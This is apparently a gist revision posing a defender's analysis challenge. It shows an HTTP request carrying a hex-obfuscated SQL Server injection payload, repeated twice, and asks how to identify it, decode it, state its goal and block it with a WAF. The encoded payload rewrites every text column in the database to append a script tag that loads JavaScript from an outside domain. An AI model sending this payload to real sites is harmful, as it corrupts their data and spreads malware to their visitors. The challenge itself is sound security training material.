rcbarnett-zz · February 9, 2015 15:53 · rdev5 · Sep 22, 2015
diff --git a/Analysis Challenge #1 b/Analysis Challenge #1
 Review this HTTP request -

 GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e5645525428564152434841522834303030292c5b272b40432b275d29292b27273c736372697074207372633d73646f2e313030306d672e636e2f63737273732f772e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
 Accept-Language: en-US
 Accept-Encoding: deflate
 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
 Host: www.example.com
 Connection: Close

 Questions:  Please provide as much detail as possible for steps used to answer these questions.
 What type of attack is this?
 Can you decode the attack payload?
 What is the end goal of the attack?
 How could a WAF detect and block this attack?
	Review this HTTP request -

	GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e5645525428564152434841522834303030292c5b272b40432b275d29292b27273c736372697074207372633d73646f2e313030306d672e636e2f63737273732f772e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
	Accept: text/html, application/xml;q=0.9, application/xhtml+xml, /;q=0.1
	Accept-Language: en-US
	Accept-Encoding: deflate
	User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
	Host: www.example.com
	Connection: Close

	Questions: Please provide as much detail as possible for steps used to answer these questions.
	What type of attack is this?
	Can you decode the attack payload?
	What is the end goal of the attack?
	How could a WAF detect and block this attack?